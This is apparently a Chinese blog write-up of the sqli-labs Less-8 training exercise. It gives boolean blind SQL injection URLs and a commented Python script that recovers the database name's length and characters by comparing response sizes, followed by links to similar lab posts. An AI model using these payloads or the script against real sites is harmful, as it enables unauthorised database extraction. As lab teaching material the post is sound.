sqli-master -8 简单exp

最新推荐文章于 2024-05-18 18:51:57 发布
最新推荐文章于 2024-05-18 18:51:57 发布
阅读量227 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luminous_you/article/details/109753408
版权

简单的exp编写
不写注释的代码,都是在耍流氓,而我不想做个女流氓
场景:sqli-master -8

1.判断注入类型
http://localhost/sqli-labs-master/Less-8/?id=1' and 1=1--+
http://localhost/sqli-labs-master/Less-8/?id=1' and 1=2--+
2.判断列数
http://localhost/sqli-labs-master/Less-8/?id=1' order by 3--+
3,判断数据库长度
http://localhost/sqli-labs-master/Less-8/?id=1' and length(database())=8--+
4,判断数据库名字
http://localhost/sqli-labs-master/Less-8/?id=1' and substr(database(),1,1)='s'--+
substr 从第一位开始截取,截取一位

#!/usr/bin/pyhton

#1.制造payload
#2.根据数据库的长度]and length(database())=8#
#3.根据数据库的名字】and substr(database(),1,1)='s'#
import requests
#a-Z的包
import string

url="http://localhost/sqli-labs-master/Less-8/?id=1"
#拼接数据库名字
database_name=''
def exp(payload_url):

	#发包
	rep=requests.get(payload_url)
	#获取包长度
	rep_len=len(rep.text)
	return rep_len

# 定义入口
if __name__ == '__main__':
	#url="http://localhost/sqli-labs-master/Less-8/?id=1"
	# 判断正确长度的payload
	nomarl_rep=requests.get(url)
	nomarl_len=len(nomarl_rep.text)

	#2.判断数据名字的长度
	for i in range(1,20):
		# str将i强制转化为字符类型 转义'
		length_payload="\'and length(database())="+str(i)+"%23"
		payload_url=url+length_payload
		#print payload_url
		#对得到的poayload_url包进行判断执行
		result_len=exp(payload_url)
		if(result_len==nomarl_len):
			print("The database length is %d"% i)
			break

	#3.判断数据库的名字

	for x in range(1,i+1):
		for y in string.ascii_lowercase:
			char_payload="\'and substr(database(),"+str(x)+",1)=\'"+y+"\'%23"
			#print char_payload
			payload_url=url+char_payload
			result_len=exp(payload_url)
			if(result_len==nomarl_len):
				#拼接
				database_name+=y
				print("the databasename is %s"% database_name)
				break

运行截图
在这里插入图片描述

luminous_you
关注
sqli-labs-master第八关
FourthGuy的博客
10-09 1648
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
sqli-labs第八关(布尔盲注)
qq_42266432的博客
08-19 1447
第八关看标题可知此关可以使用布尔盲注,布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
sqli-master( 1-10 )
猎荒者
01-16 321
人过留名,雁过留声 人生天地间,凡有大动静处 必有猪头 环境准备 phpstydy firefox 浏览器 HackBar 插件 sqli-labs-master 源码 sublime Less 1 ① 源码分析 1.采用 get 方法接收用户输入 2. 单引号闭合参数 3. 参数拼接 sql 语句进行数据库查询 ② 漏洞利用 1. 看看有当前数据表有多少列。 1.1 猜测列数为 3 ...
SQL注入之sqli-labs(八)
m0_60716947的博客
04-29 1043
目录 (八)第四十六关到五十二关 (1)补充知识 (2)第四十六关 (3)第四十七关 (4)第四十八关 (5)第四十九关 (6)46-49关使用一句话木马 (7)第五十关 (8)第五十一关 (9)第五十二关 (10)第五十三关 (八)第四十六关到五十二关 (1)补充知识 order by 1 desc 使用降序进行排列 order by 1 asc 使用升序进行排列 lines terminated by xxx 以xxx结尾 select * from users
sqli-labs-master第一关sql注入
你的小粉丝的博客
07-25 1260
先了解一下数据库 先登录账户,输入密码 之后可以看到N个数据库 打开数据库可以看到N个表 每个表里还有N个字段 除了用sql语句查看,当然也可以用MySQL等直接查看 开始步入正题 sql注入 url处先尝试着输入?id=1; 再尝试?id=2; ...
sqli-labs第五关sql注入流程
qq_33598708的博客
03-30 5759
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。 所以这关的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
sqli-labs第三关
07-28
- *2* [sqli-labs-master之第三关](https://blog.csdn.net/weixin_66387649/article/details/129256414)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
【渗透测试】sqli-labs闯关(1-10)
qq_43168364的博客
04-20 560
第一关
【合天网安】SQLi-Labs系列之字符型报错注入(单引号和括号)
hehigoxqc606的博客
09-01 359
1、点击GET-Error based-Single quotes with twist – string,进入实验界面 在id值后面多加一个单引号,引发报错,根据提示信息,我们可以发现sql语句是使用了单引号和右括号闭合 2、可以在第二或第三字段中用version()函数代替,查看当前数据库的版本,得出版本为5.5.53。 http://localhost/sqli-labs-master/Less-1/?id=-1')+union+select+1,version(),3--+ .
SQL注入学习—sqlilabs环境搭建以及代码审计(1—10关代码详解)持续更新1-65关
qq_53717877的博客
10-13 936
目录 环境搭建 SQL注入概念讲解 代码审计 Less1: 源码讲解 Less2 源码讲解 Less3 源码讲解 Less4 源码讲解 Less5 源码讲解 Less6 源码讲解 Less7 源码讲解 Less8 源码讲解 Less9 源码讲解 Less10 源码讲解 环境搭建 Github上直接搜索sqli-labs直接会有源码,php、asp版本的都有,我这是使用的一个php经典版本,sql注入必备 Github链接:https://gith...
DoraBox-master——SQL注入练习
sevenlob的博客
03-01 729
DoraBox-master环境搭建 今天开始做DoraBox-masterSQL注入练习。DoraBox-master的搭建和通关都要比sqlimaster简单一点。 给一份官方下载地址DraBox在GitHub下载 先改好coon.php文件,一般来说红框框里都改成root 在使用PHP study搭建的环境之下,在 命令行中进行操作。 先把数据库文件打开,每个人安装的位置不一样,但大致...
SQLi-labs-Master(1-22)新手通关宝典
最新发布
Myosotis_LL的博客
05-18 2319
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs-master靶场搭建以及报错解决
Belever的博客
04-05 2071
sqli-labs-master靶场搭建以及报错解决
Sqli-labs环境搭建教程(sql注入)
Victor1889的博客
01-06 9507
Sqli-labs环境搭建教程(sql注入)
SQL注入之sqli-labs-master靶场第1、2关
qq_24797991的博客
04-04 959
SQL注入闯关
Sqli-labs-master超详细通关教程(1-23关|基础篇)
热门推荐
weixin_51143375的博客
11-02 2万+
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
SQL注入之——sqli-labs-master 下载与安装
冰河的专栏
11-19 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84262285 注意事项,写在前面。 php版本一定要设置成 7 以下,7之后的mysql_都改成了mysqli_**了,用7以上版本的话会报错 *****************************************************************...
pwn学习-简单exp的编写
qq_39153247的博客
08-16 6112
不太喜欢写博客,水平有限见谅。   记录一些关于pwntools的简单用法 expexploit的简写,可不是experience。   0x00.  下载pwntools: 现在需要sudo pip install pwntools就可以了(linux环境下,且环境应该是2.7) 安装好之后你就也拥有了checksec 查看当前ELF文件的保护情况 以及ROPgadget 可以...
通过sqli-labs-master第八关完成dns带外攻击回显
快递小哥的博客
01-09 612
1.利用dns缓存原理找到数据(dnslog平台查询) 2.在mysql里面获取想要的参数(load_file() 读取文件函数 version() 版本信息函数)concat() 多列合并到一起 1.txt是文件名(可以新创一个,主要是让函数生效) ,可以把一整个理解成是localhost\\1.txt,前面是网站路径,是在这个路径里面拿文件,这样版本号就出来了 ...
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值